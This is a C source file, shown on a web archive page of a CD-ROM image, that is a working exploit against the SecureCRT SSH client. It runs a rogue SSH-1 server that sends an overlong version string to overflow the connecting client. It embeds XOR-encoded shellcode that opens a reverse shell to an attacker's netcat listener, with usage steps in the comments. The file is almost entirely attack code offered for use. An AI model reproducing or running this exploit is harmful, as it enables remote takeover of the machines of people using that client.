home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / terminals / securecrt / securecrt-exp.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  5.6 KB  |  151 lines
  1. // The bug was discovered by Kyuzo
  2. // The schell code exploit was coded by Andrea Lisci
  3. // The program working in the following way
  4. //
  5. // run the exploit
  6. //./shellcode <netcat_machine> <netcat_port>
  7. // run the netcat
  8. // nc -l -p <netcat_port>
  9. // connect from secureCRT to the port 9988 using ssh version 1
  10. //
  11. // the remote shell will be opened at netcat computer
  12.  
  13.  
  14.  
  15. #include <stdio.h>
  16. #include <sys/types.h>
  17. #include <sys/socket.h>
  18. #include <netinet/in.h>
  19.  
  20. #define PORT 9988
  21.  
  22. int main(int argc, char **argv) {
  23.     int s, n, i, sz = sizeof(struct sockaddr_in);
  24.     struct sockaddr_in local, whatever;
  25.     char payload[2510], *pshell;
  26.  
  27.     unsigned char preshell[]="\xb8\x00\x03\xff\xe0";
  28.  
  29.  
  30.     unsigned short int a_port;
  31.     unsigned long a_host;
  32.     struct hostent *ht;
  33.     struct sockaddr_in sin;
  34.  
  35. unsigned char shell[] =
  36. "\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
  37. "\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
  38. "\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
  39. "\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
  40. "\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
  41. "\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
  42. "\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
  43. "\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
  44. "\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
  45. "\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
  46. "\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
  47. "\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
  48. "\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
  49. "\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
  50. "\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
  51. "\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\x16\x53\x84"
  52. "\x6a\x73\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
  53. "\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
  54. "\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
  55. "\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
  56. "\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
  57. "\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x80\x26\x52\xd2\x91\x55\x3d\x95\x94"
  58. "\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
  59. "\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
  60. "\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
  61. "\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
  62. "\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
  63. "\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
  64. "\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
  65. "\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc3\x98\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
  66. "\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
  67. "\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
  68. "\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
  69. "\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
  70. "\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
  71. "\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
  72. "\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
  73. "\xc6\xf9\xf0\xf0\xe5\x95\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\xed\x95"
  74. "\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
  75. "\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
  76. "\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
  77. "\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
  78. "\xf0\xed\xf0\x95\xc4\x2b\x02\x75\x66\xc7\x47\x4c\x01\x81\x50\x8d\x47\x20"
  79. "\x50\x83\xee\x11\x05\x11\x11\x11\x01\x2d\x7a\x12\x11\x01\xff\xe0";
  80.  
  81.  
  82.  a_port=htons(atoi(argv[2]));
  83.  a_port ^= 0x9595;
  84.  //ht=gethostbyname(argv[1]);
  85.  //a_host= (unsigned long) *(ht->h_addr);
  86.  a_host=inet_addr(argv[1]);
  87.  a_host ^= 0x95959595;
  88.  
  89.  shell[385]= ((a_port) & 0xff);
  90.  shell[386]= ((a_port >> 8 ) & 0xff);
  91.  shell[390]= ((a_host) & 0xff);
  92.  shell[391]= ((a_host >> 8) & 0xff);
  93.  shell[392]= ((a_host >>16) & 0xff);
  94.  shell[393]= ((a_host >>24) & 0xff);
  95.  
  96.   memset(payload,0x90,sizeof(payload));
  97.  
  98.  
  99.  
  100.     strcpy(payload, "SSH-1.1-");
  101.     for (i = 8; i < 267; i++)
  102. payload[i] = 'A';
  103.     payload[i+1]=0x00;
  104.     payload[i+2]=0xbb;
  105.     payload[i+3]=0x12;
  106.     payload[i+4]=0x00;
  107.     payload[i+5] = '\n';
  108.     payload[i+6]= '\0';
  109.  
  110.     pshell=&payload;
  111.     pshell+=100;
  112.     memcpy(pshell,preshell,sizeof(preshell));
  113.  
  114.     pshell=&payload;
  115.     pshell+=300;
  116.     memcpy(pshell,shell,sizeof(shell));
  117.  
  118.  
  119.     if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  120. perror("socket");
  121. return 1;
  122.     }
  123.     local.sin_family = AF_INET;
  124.     local.sin_port = htons(PORT);
  125.     local.sin_addr.s_addr = INADDR_ANY;
  126.     memset(&(local.sin_zero), 0, 8);
  127.     if (bind(s, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) {
  128. perror("bind");
  129. return 1;
  130.     }
  131.     if (listen(s, 2) == -1)  {
  132. perror("listen");
  133. return 1;
  134.     }
  135.     printf("waiting for connection...\n");
  136.     if ((n = accept(s, (struct sockaddr *)&whatever, &sz)) == -1) {
  137. perror("accept");
  138. return 1;
  139.     }
  140.     printf("client connected\n");
  141.     if (send(n, payload, sizeof(payload) - 1, 0) == -1) {
  142. perror("send");
  143. return 1;
  144.     }
  145.     printf("sent string: [%s]\n", payload);
  146.     close(n);
  147.     close(s);
  148.     return 0;
  149. }
  150.  
  151.